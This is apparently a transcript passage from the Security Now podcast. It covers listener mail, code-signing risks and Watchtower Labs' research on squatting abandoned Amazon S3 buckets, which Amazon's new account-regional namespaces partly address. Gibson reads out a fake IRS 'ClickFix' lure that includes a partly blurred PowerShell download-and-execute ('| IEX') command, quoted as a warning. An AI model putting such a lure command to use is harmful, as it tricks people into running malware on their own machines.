Addressee Jeffrey. And then there's— we have a case ID, and it says you must respond within 7, parentheses, numeral 7, calendar days. Your account has been selected for an office examination. Internal Revenue Code Section 7602 authorizes the IRS to require you to appear and provide records. We've identified a mismatch between the income on your tax return and data received from payers. Oh, uh, 1099s that you didn't report— that's never good. To resolve this matter, you must appear at an IRS location. Receipt of this notice must be acknowledged using the secure method below so we can schedule your appointment.

Steve Gibson [02:00:45]:
Non-acknowledgment will be deemed failure to respond. This notice does not contain clickable links. Acknowledgment may only be made via the secure method indicated. And now we have the increasingly familiar and unfortunately increasingly successful click-fix variant. It says in a separate box callout, it says acknowledgment required. Step 1: Hold the Windows and R keys together to open Run. Step 2: Type or paste the acknowledgment code from the box below into the Open field. Step 3, press Enter.

Steve Gibson [02:01:32]:
We will then assign your appointment. And then it provides in a— for, you know, the down below acknowledgement code, which starts out reading PowerShell space quote, and then we have something that Jeffrey blurred out. Then we have forward slash IRS and then a space vertical bar space IEX. And then a close quote. So, uh, again, as we know, this succeeds because so few people actually understand how Windows works. They're users who basically follow scripts of various forms, uh, and this latest trend of click fix, uh, to me is truly frightening. We've learned and previously reported that more than half, and I think it was 52%, of all exploits combined are now attributable to this single category of clicks-fix-related social engineering attacks. More than half of all successful attacks.

Steve Gibson [02:02:43]:
And even before we had this number, it was clear just looking at them that these attacks which leverage the user's lack of true understanding of how their PCs operate would turn out to be devastating. So, Jeffrey, thanks for sharing that. Um, Jim Housley wrote, listening to SN 1070 from March 17th, so that's last week, you were talking about properly signed malware and you commented about how the certificate had to be in an HSM. You know, hardware security module. He said, however, in the previous 2 or 3 weeks when you were talking about the current options for you to get a new certificate, you mentioned that signing in the cloud was becoming an option and seemed to be preferred by the CAs. With cloud-based signing, isn't it possible to share or steal access to the cloud account to use someone else's certificate? Longtime listener since episode 1, Spinrite owner. Thanks, Jim. In a word, yes, you are 100% correct, Jim.

Steve Gibson [02:03:52]:
Once code signing is moved into the cloud, then we introduce the whole new specter of remote network authentication into the code signing domain, and Huh. Has there ever been any trouble with authenticating who people are over a network? Yeah. I believe I'd prefer to take responsibility for my own code signing certificate that's password protected in a hardware module which resides inside a closed server inside a locked rack inside a locked cage that's under 24/7 surveillance using a triple locked building with biometric PIN and badge reader and ever-prowling security. That's where mine is, and it has never suffered a break-in. So I think old-school physical security is a little better than allowing, you know, foreign attackers from states we don't trust free roam and access, trying to impersonate us and get our code signed. I think Jim is exactly right. And finally, Michael wrote, hey Steve, you're not alone in your love of coding. Like you, I absolutely love writing my own code and solving problems myself.

Steve Gibson [02:05:24]:
I don't care if I'm not as fast as AI as long as I am fast enough to achieve my own goals. And like you, I'm writing professional software It's not just a hobby, and like you, I'm a one-man team and my own boss. Consider this analogy: many fishermen buy their poles and lures at Walmart, which is fine, but there exists a small subset of fishermen who make their own lures. And I'll bet you would, Micah, because you're a craftsperson.

Mikah Sargent [02:05:57]:
I was going to say, ooh, this sounds fun.

Steve Gibson [02:06:00]:
Who make— who who make their own lures because they're craftsmen who love the craft, and the experienced ones produce much better lures than the machine-assembled ones available at Walmart. I suspect your code is the same, and I'd much rather buy software like Spinrite from you, which I know you had— which I know has had your full attention and 30 years of maturation than ask Claude to write a cheap knockoff. Just like I'd much rather write my own software, you know, make my own lures essentially, than cheat myself out of the joy of coding. That said, I do use Gemini to do the things I do not enjoy, like writing regular expressions, but even then it makes mistakes that I often need to correct. Anyway, you keep on coding and know that you're not alone. Longtime listener and huge fan, Michael. And I like Michael's fishing lure analogy a lot. Yeah, it— I think it clearly articulates the craftsmanship aspect of coding, which anyone who codes, you know, uh, because they love it just for its own sake would understand.

Steve Gibson [02:07:29]:
So for me, AI producing code does not represent a worry or competition. Uh, you know, I've never been interested in coding in a production environment. I love that many more people than ever before are now finding themselves able to get their PCs to do things they never could before because AI is able to create code for them, which does what they want. You know, to me, that's the greatest innovation so far on the AI coding front. And I'm sure that we, as I've said, we've only seen the tip of the iceberg. We've got lots more to come in, in upcoming years. Okay, and Micah, that brings us to, uh, our final break before we talk about bucket squatting— what it is, what it means. And, uh, I don't know, I don't think you want to squat over a bucket.

Mikah Sargent [02:08:27]:
No, no. In fact, uh, ever since the introduction of plumbing and the toilet, I don't need a bucket anymore. Um, anyway, Well, let me take a moment here before we continue on with the show to tell you about Club Twit at twit.tv/clubtwit. That is where you can go to sign up. $10 a month, $120 a year gets you access to the club. You can also use that QR code up in the top corner there. When you join the club, you gain access to some pretty awesome benefits. You get every single one of our shows ad-free, just the content.

Mikah Sargent [02:08:58]:
You also gain access to our special feeds. We have feeds that you will enjoy, including our feed that has our kind of behind the scenes before the show, after the show. We have a feed that has our live coverage of tech news events. We also have a feed that has our special Club Twitch shows like what was alluded to a couple of times here, my crafting corner. We have Stacy's book club. We have so many good things there in the club. And if that's not enough, well, can I also invite you to join our Discord, a fun place to go to chat with your fellow Club Twitch members and those of us here at Discord. Board.

Mikah Sargent [02:09:34]:
Excuse me, those of us here at TWiT, we would love to have you. So head to twit.tv/clubtwit to check it out. Can't wait to welcome you into the fold. All right, back from the break. I've got my bucket. My, my legs are ready. Tell us all about it.

Steve Gibson [02:09:55]:
Okay, a little over a year ago, back in February 2025, So 13 months ago, Watchtower Labs posted a troubling narrative that documented the degree to which the security of significant parts of the internet have not been thoroughly thought through before being implemented. And it's not only new tech like, you know, the open source repositories that bad guys are constantly attacking and poisoning or some AI that can be subverted. The greater lesson the past 21 years of this podcast has taught over and over is that not only is security difficult, but we keep discovering that it's even more difficult than we thought. Or as we just recently noted, uh, security needs to be more secure. One thing to fully appreciate is that only a portion of security failures result from bugs, just as many failures are the result of inattention, oversight, and poor design, or what I often lump into the label of policy, as opposed to mistakes. So this suggests that even after AI being used to improve our security has matured, as I'm sure it will, and it's able to help us far more strongly eliminate traditional exploitable bugs, that will not be the end of our security woes, since even the misapplication of flawless technology can still result in serious consequences. So I don't see security as an issue being resolved by AI. So this brings us back to Watchtower Labs' exploration from February 2025.

Steve Gibson [02:11:48]:
It's a perfect teaching example of a system's poor design's unintended consequences. Watchtower's posting February before last was given the headline, '8 million requests later, we made the SolarWinds supply chain attack look amateur.' So here's what they wrote back then. They said, surprise, surprise, we've done it again. We've demonstrated an ability to compromise significantly sensitive networks, including governments, militaries, space agencies, cybersecurity companies, supply chains, software development systems, and environments. And more. In November 2024, we decided, they wrote, to demonstrate the scenario of a significant internet-wide supply chain attack caused by abandoned infrastructure. I'll just pause to note that we've, we've looked at problems with abandoned infrastructure before, where something has all been set up and is going It's, it's for whatever reason, you know, been left behind. Pieces of it maybe have been taken away, but some pieces remain, and those end up being targets of abuse.

Steve Gibson [02:13:18]:
So they said, this time, however, we dropped our obsession with expired domains, which of course is an example we've looked at before, and instead shifted our focus to Amazon's S3 buckets, thus bucket squatting. They said it's important to note that although we focused on Amazon S3 for this endeavor, this research challenge approach and theme is cloud provider agnostic and applicable to any managed storage solution. Amazon's S3 just happened to be the first storage solution we examined. and we're certain the same challenge would apply to any customer organization usage in any storage solution provided by a cloud provider. The TL;DR is that we ended up discovering around 150 Amazon S3 buckets that had been used across commercial and open-source software products, governments, and infrastructure deployment and update pipelines before they were abandoned. 153 Amazon S3 buckets that were used before being abandoned. They said, so we registered those abandoned buckets to see what would happen. The question was, how many people might be attempting to request software updates from S3 buckets that appear to have been abandoned months or even years before? Wow.

Steve Gibson [02:15:06]:
At this, uh-huh. At the start of this, we had no idea how this would turn out. The research panned out progressively, with S3 buckets registered as they were discovered. It went rather quickly from, aha, we could put our logo on this website, to, uh,.mil? We should probably speak to someone about that. Oh my God. They said after spending around $400, as in only $400, on S3, CloudTrail, and CloudWatch logs, querying, we had some results worth talking about. When creating these S3 buckets, we enabled logging, allowing us to track who requested files from each S3 bucket via the source IP address and what they requested, the file name, the path, and the name of the S3 bucket itself. Collectively, these S3 buckets received, huh, more than 8 million.

Steve Gibson [02:16:16]:
Are you kidding me? 8 million HTTP requests over a 2-month period for all sorts of things. Those making the queries for whatever it was that used to be there were requesting all sorts of things. Software updates, pre-compiled unsigned Windows, Linux, macOS binaries, virtual machine images, JavaScript files, CloudFormation templates, SSL VPN server configurations and credentials, and more. Had we been maliciously inclined, we could have responded to each of these 8 million requests with something malicious like a nefarious software update, a CloudFormation template that gave us access to an AWS environment, virtual machine images backdoored with remote access tooling, binaries that deployed remote access tooling, scary ransomware or such, and so forth, to give us access to the requesting system or network that the requesting system was within, and in some cases.mil. They wrote, these many millions of incoming give-me-this-file requests came from the networks of organizations based on DNS WHOIS lookups that included government networks in the USA, including NASA, numerous laboratories, state governments, etc. The UK, Poland, Australia, South Korea, Turkey, Taiwan, Chile, and more. Then there were military networks and the networks of Fortune 500s, Fortune 100s, a payment card network, a major industrial product company, global and regional banks and financial services organizations, universities around the world, instant messenger software companies, cybersecurity technology companies, casinos, and more. We want to take this opportunity to give our sincere thanks, they wrote, to the entities who engaged with us when we realized what we'd stumbled into, including the UK's NCSC, who helped with introductions to the correct teams for us to speak to.

Steve Gibson [02:18:53]:
AWS, who took those around 150 S3 buckets off our hands to sinkhole. A major unnamed SSL VPN appliance vendor who worked with us very quickly and directly to take relevant S3 buckets off our hands. And CISA, who very quickly remediated an example that affected cisa.gov. Wow. Yeah. AWS's agreement to sinkhole the identified S3 buckets means that the release of this research does not increase the risk exposed to any party. The same issues discussed in this research could not be recreated against the same specific S3 buckets thanks to the sinkholing performed by the AWS team. We believe that in the wrong hands, the research we performed could have led to supply chain attacks that outscaled and out-impacted anything we as an industry have seen so far.

Steve Gibson [02:20:02]:
As an industry, we spend a lot of time trying to solve issues like securing the supply chain in as many complex ways as possible. While still completely failing to cover something as simple as make sure you don't take candy from strangers, unquote. Okay, so what— so their posting then delves into the specific details about each of these many extremely embarrassing and potentially explosive exposures. To best understand how the industry got into this mess, We need to talk a bit about Amazon's somewhat astonishing AWS S3 bucket naming. First of all, a so-called bucket is nothing special. It's just Amazon's name for a cloud-based directory that can hold files. The name S3 itself, you know, stands, you know, that's three S's, right? Stands for Simple Storage Service. That's what S3 stands for, Simple Storage Service.

Steve Gibson [02:21:14]:
And simple is exactly what it is. The simplicity of Amazon's Simple Storage Service likely accounts for much of its, you know, early success and popularity. But it may also have contributed to the service's very spotty security record. I mean, there's been lots of problems with exposed AWS S3 buckets in the past. What's perhaps most shocking about Amazon's S3 bucket naming is that access to any S3 storage bucket is via an HTTP URL that ends with the standard web domain s3.amazonaws.com. And surprisingly, that ending can be prefixed with anything that looks like a valid World Wide Web domain name having between 3 and 63 characters, because that's exactly what it is. For example, I have an Amazon bucket named GRC. That's right, the bucket's name is GRC, which means that the bucket's full name is GRC.S3.amazonaws.com.

Steve Gibson [02:22:42]:
And that bucket can be accessed by anyone, anywhere in the world at any time. And if that seems like a terrifying thing, You'd be correct to think that the only thing that even begins to make this system safe is access controls. So of course I have extremely strong access control security policies set on that bucket so that only I am able to work with it. But we've seen many examples where someone mistakenly, though presumably At some point, for some purpose, deliberately allowed global read or read-write access to one of their S3 buckets, and disaster soon followed.

Mikah Sargent [02:23:30]:
That shouldn't even be an option, right? Like, why would anyone ever want—

Steve Gibson [02:23:35]:
well, read-write, I would agree, although you might want people to be able to put information up, like to, to submit things to you. And certainly, if you were, for example, a certain SSL VPN appliance vendor, you might want to have your appliance querying that S3 bucket by name, whatever name you've given it, to pull down updates or security configuration improvements or something. So you're basically using it like a globally accessible CDN. A content delivery network. So actually, that's how many people use it. So, okay, as a consequence, I have a bunch of S3 buckets with many wonderful, simple, and fun names since I got there early and I grabbed them. Assignment of S3 bucket names could not be any simpler. It's as simple, uh, you know, as first come, first serve, like Twitter handles were back in the day.

Steve Gibson [02:24:41]:
If you attempted to create a bucket, which is always by name, that effort will succeed if that name is not currently assigned to anyone else's bucket. So I have GRC, and that name is exclusively mine until I delete it. And as long as I have it, no one else can have it. In computing, we, you know, we call this— this is known as a global namespace, a single shared naming space where every name must be unique. So this means that everyone in the world shares the same naming space. There's only one Amazon S3 namespace that everyone shares to name any and all of the S3 buckets they may have created and governed by whatever access controls its owner may have configured. Any S3 bucket is accessible by its name simply by appending.s3.amazonaws.com to the end of it. For the sake of thoroughness, I'll add that S3 bucket names must be between 3 and 63 characters total.

Steve Gibson [02:26:07]:
They must always be lowercase alpha from A through Z, or a numeric digit, uh, digits 0 through 9. You can also have dots and hyphens, so just like domain names. They must— they also must begin and end with a letter or a number, meaning they, uh, they cannot begin and end with dashes, and they cannot contain a pair of adjacent dots. Uh, there must also be, uh, uh, I mean, there are also a bunch of specially reserved prefixes and suffixes that Amazon has, uh, but like for things like puny code and things. So in order to use a large— a larger, uh, spelling alphabet. But overall, anything that anyone wishes to use will be valid within those guidelines. And notice that I, I keep saying that any bucket that isn't currently in use by someone— the point here, and this is where things get somewhat sticky, is that buckets that are no longer needed by their owner can be deleted. Two things occur when that happens: whatever content they may have contained will be deleted, and the bucket's name, which will then no longer be in use by its original owner, will be released and returned to the available bucket pool and become available for use by anyone who wishes to have it by name.

Steve Gibson [02:27:47]:
So now we see what these Watchtower guys did. They created some form of directed brute force Amazon S3 bucket scanner which they used to search for named buckets that once existed but which were then deleted by their original creators. The problem was that many widespread automated tools, software update systems, antiviral templates, virtual machine images, even executable program downloaders continued in their attempts to access those previously, the content within those previously deleted buckets. So when these researchers discovered and recreated one of these previously deleted buckets and began logging the failed file access attempts, they were able to quickly learn what resource something somewhere was attempting to obtain from that bucket. The danger of this is obvious and truly horrifying. Given that they could see what it was that was being requested, they could readily choose to return whatever malicious content of that form they might wish. Since these requests were being made over TCP connections, the true IP address of the entities making the requests could be determined German. They wrote, remember, they wrote, these many millions of incoming give-me-this-file requests came from the networks of organizations that included, you know, government networks in the USA, NASA laboratories, state governments, etc., the UK, Poland, Australia, South Korea, Turkey, Taiwan, Chile, and more.

Steve Gibson [02:29:48]:
You know, on and on. Universities, instant messaging software companies, cybersecurity technology companies, casinos, and more. Credit card processing companies, you know, you name it. So this is not the result, and this is the key. This is not the result of a bug. This was the result of a fundamentally poor system design. Amazon should never have allowed bucket names to be recycled and reused. And in fact, right now, they ought to take any which were ever in use.

Steve Gibson [02:30:27]:
Yep. And, and sinkhole them. Just take them offline. Um, and really, when you think about it, bucket names are really just vanity, right? They're like—

Mikah Sargent [02:30:39]:
yeah, that's what I was thinking.

Steve Gibson [02:30:40]:
Yeah, it doesn't matter. They're like license plates. All you really need is something random and unique that's yours. It doesn't need to be your name, your initials, or some cutesy expression. But when users are given a choice, they'll tend to create bucket names that are meaningful to them. And that likely means they could be guessed by someone else. You know, anybody could guess I might have GRC. Well, I do.

Steve Gibson [02:31:10]:
So yeah, and I'll admit it, I'd rather have GRC than 092D7630B5F, you know, much sexier. But since S3 buckets are almost always accessed by automation, names were really never even necessary. They were just for fun. But that fun comes at a cost. Since Amazon chose to give us control over our bucket names, they should have appreciated the inherent problem with reuse and made them single-use from the start. Once taken, can never be used again. Okay, I have GRC, and that should be it forever. But it probably won't be unless they change their policy, which after all they could at any time.

Steve Gibson [02:32:02]:
My use of GRC, those three initials, will eventually end because I will eventually end. You know, whether I do it deliberately or not, I'll cancel my longstanding AWS account or it'll be canceled posthumously. At that time, the account's data will be deleted and the GRC bucket, the bucket name GRC, you know, uh, will be recycled back into the available pool, ready to be used again by someone. I have only ever used S3 as an off-premises encrypted storage archive. The danger for me has never been present. You know, there's nothing for anybody to ask for. But the guys at Watchtower discovered that many S3 users are using— once used, in other words, or I meant once used their S3 buckets as a form of CDN to deliver quite sensitive files. Both Microsoft Azure and Google Cloud have long provided protections against the inherently dangerous practice of recycling bucket names within a single global namespace, which enables this form of bucket squatting.

Steve Gibson [02:33:21]:
As it's appropriately been called, but Amazon has been slow to come around. You know, change is always difficult, but the good news is, and the reason this— we're talking about this today, is that last Thursday, at long last, that finally changed. Amazon's announcement carried the headline, introducing account regional namespaces. For Amazon S3 general purpose buckets. And they wrote the following— short, it's just quick. They said, today we're announcing a new feature of Amazon Simple Storage Service, Amazon S3, you can use to create general purpose buckets in your own account regional namespace simplifying bucket creation and management as your data storage needs grow in size and scope. You can create general-purpose bucket names across multiple AWS regions with assurance that your desired bucket names will always be available for you to use. And that last phrase, with assurance that your desired bucket names will always be available for you to use reminded me of another aspect of the single global namespace problem, which is that no one owns anything about any not yet created bucket names.

Steve Gibson [02:34:54]:
You know, the Amazon S3 namespace is flat, as I said, not hierarchical. If I own the domain, as I do, grc.com, then I also automatically own all subdomains and hostnames of grc.com, www.grc.com, and forums.grc.com, and noodles.grc.com. They're all automatically mine. We would say that everything under grc.com is mine. But, you know, under only applies because the domain name system is an inherently hierarchical namespace. There's no under in any flat namespace such as S3 has always used. So for example, you know, that, that, um, say that an organization had the practice of saving their annual archives into a series of buckets named ACME Enterprises Archive 2024. Then the next year, ACME Enterprises Archive 2025, and so on, where the year obviously is incremented successively.

Steve Gibson [02:36:14]:
If some begrudging ex-IT employee— you know where we're going— wished to cause their ex-employer ACME Enterprises some grief, nothing prevents them, the ex-employee, from opening an Amazon S3 account, which costs nothing, and creating the bucket ACME Enterprises Archive 2026. Now, at the end of this year, when ACME Enterprises went to create their succeeding year's archive bucket, that attempt would fail. Because someone else had beaten them to it. Having a single global namespace shared by every S3 user may have once seemed simple and maybe even fun, but there's a better way. So Amazon's addition of what they're now calling account regional namespaces is a long-needed addition. Their announcement continues to explain this, writing, with this feature You can predictably name and create general-purpose buckets in your own account regional namespace by appending your account's unique suffix in your registered bucket name. For example, the bucket named ourbucket-123456789012-US-EA east-1-an. Okay, not particularly sexy, but okay.

Steve Gibson [02:37:47]:
Um, that would exist in an account regional namespace. They said our bucket is the bucket name prefix specified, then we add the account regional suffix to the requested bucket name, which is that -123456789012-us-east-1-an. East-1-an. If another account tries to create buckets using this account suffix— and Lord, why would they— their requests will be automatically rejected. So that's the good news. You get protection against somebody trying to create a bucket with your specific account number suffix. They finish saying your security teams can use AWS Identity and Access Management policies and AWS Organizations service control policies to enforce that your employees are only able to create buckets in their account regional namespace. This will help teams adopt the account regional namespace across your organization.

Steve Gibson [02:38:59]:
Okay, so I would argue that the implementation of this is something of a kludge. The total length of the bucket name prefix plus the regional account suffix is 63 characters. So they've really only done two things. First, any bucket created while this new policy is enabled must end in the proper account number regional suffix. Second, that account number regional suffix is now reserved for employees using that account number, so no one else can create a bucket which uses that suffix. And I guess a third thing they've done is they've, they've allowed you to set policies They have, you know, upper management, the IT overlords can set policies that require all new buckets created to use this account regional namespace suffix. So they finally addressed this problem. Notice that it is incumbent on the organization to turn this on, right? This doesn't do anything retrospectively, retroactively.

Steve Gibson [02:40:23]:
All of that is still a problem. That is, non-regional suffix buckets presumably still exist and work, but only newly ones created. So this is just enforcing a new bucket creation policy, bucket creation naming policy on future bucket creation. So unless Amazon also decides to prohibit the recycling of previous bucket names, and they ought to just take— they ought to immediately, you know, blacklist any that have been abandoned right now. Uh, they're still doing nothing to prevent bucket squatting on earlier buckets, which these guys may not have found. They had to do some sort of brute force scanning to find all of these buckets. They— there are probably other buckets that still exist that have not been found. So, you know, the good news is if organizations adopt and enable this enforcement account number regional suffix bucket naming, then at least going forward, the problem will have been prevented.

Steve Gibson [02:41:32]:
And that is bucket squatting.

Mikah Sargent [02:41:37]:
That is far more terrifying than I thought it was going to be based on the name. I will say that. That's, um, pretty prevalent across the web. And the fact that they're frightening—

Steve Gibson [02:41:50]:
how, yeah, how widespread this is.

Mikah Sargent [02:41:53]:
There's a, there's a level of creativity among security researchers that I really find to be quite incredible. When sometimes you'll be talking about these different exploits and ideas, and I think about the thinking required to get to that end point, right? And it's, you know, despite being on its face a more practical, more sort of scientific approach, there's a lot of creativity that's involved in the work that you all do. And I think that that's something that really stands out to me at these times because I just, yeah, you have to think about the different tools that we use that are out there and then go, as you like to say, what could possibly go wrong? And that list can be hundreds of thousands of things, and you just highlight the one. Oh yeah, let's check this. Let's see if that works. This is just a cool thing to think of, but it's a terrifying outcome whenever it comes out to be true, right?

Steve Gibson [02:42:58]:
Yeah, yeah, we're, we're still just drive— on one hand, I think we're we're, we're dragging legacy design and policy forward. And it's, it's also the case that, I mean, because AWS was created once after the internet was mature, we already, I mean, you know, as a cloud-based service. Yet these guys didn't stop to think, well, what if somebody uses automated agents to pull code from buckets and like, like firewalls or SSL VPN appliances that, that are— they're checking for new firmware, and then they go out of business, or they decide, we don't like this bucket, we're going to move that in-house. But there's all this equipment out there that is still pulling from a bucket which has been abandoned, but some bad guy could then register and have and provide their own download for all this equipment to download. I mean, this is a, this is a real problem.

Mikah Sargent [02:44:03]:
Yeah, they actually proved it to be a real problem. Yes, that's, that's terrifying. I'm glad that it's, you know, again, we're shining a light on it.

Steve Gibson [02:44:13]:
That's the first step. And it's the good guys who are finding it and not the bad guys because it could be exploited. Unfortunately, there appear to be no, no lack of problems that the bad guys are finding and exploiting too.

Mikah Sargent [02:44:25]:
There are always so many things on that list that we talked about earlier. So Steve, I'm glad that you have your eye on the prize and that others out there are paying attention as well. Uh, this has been Security Now. The show publishes every Tuesday. twit.tv/sn is where you go to find the show. Heading there gives you access to the audio and video versions of the show. You can, of course, check out grc.com where you will find all sorts of good things. It's also where you can go to make sure that you are part of the email subscriptions and to send Steve email as well.

Mikah Sargent [02:45:15]:
And of course, It's the place where you can go to get Spinrite, Steve's bread and butter, plus the DNS Benchmark.

Steve Gibson [02:45:24]:
That's available now, right? Yeah, yeah, it has been for months. Yep, the DNS Benchmark is now available.

Mikah Sargent [02:45:31]:
Wonderful, wonderful. Uh, Steve, thank you so much for another great episode. If I'm forgetting anything, now's your time to tell us. I think you got it. Oh, wonderful. Wonderful.

Steve Gibson [02:45:43]:
Thanks for doing a great job at your end.

Mikah Sargent [02:45:46]:
Thank you. Yeah, it's always a pleasure to get to join you on the show. Leo will be back next week, everyone. Don't worry. Um, but thank you.

Steve Gibson [02:45:53]:
He does, he does have some travel planned for later this year, so we're going to be seeing more of you. Yes, indeed.

Mikah Sargent [02:45:58]:
And I'll be right here ready for it. All right, I think that does it for this week. So goodbye, Steve, and goodbye, listeners. Thanks, buddy. Bye. Thank you very much. Hey, I'm Micah Sargent, host of Tech News Weekly and several other shows on the network. If you're looking for a smarter way to advertise in 2026, look no further, because TWiT is where tech decision makers listen and ROI never ends.

Mikah Sargent [02:46:26]:
Our audience isn't just passionate about technology either. They actually work in it. Over 90% of our listeners are IT professionals, developers, engineers, and business leaders who shape the products and the decisions that move tech forward at their companies. Here at TWiT, we produce an array of trusted tech shows. These include the latest news and hands-on advice featuring authentic, embedded, host-read ads delivered by Leo Laporte and yours truly. Now, our partners see real results because our listeners actually trust trust us and then take action. And that's because of authenticity. When I'm talking about how I like a product or a service, it's because I actually do.

Mikah Sargent [02:47:09]:
And our listeners know that. And here's something we're super proud of. 88% of our listeners say they've made a purchase because of a TWiT ad. So if you're ready to reach the most intelligent audience in tech with that purchasing power to back it up, Let's talk. We'd love to help your brand grow. Email partner@twit.tv or visit twit.tv/advertise. Security Now.

All Transcripts posts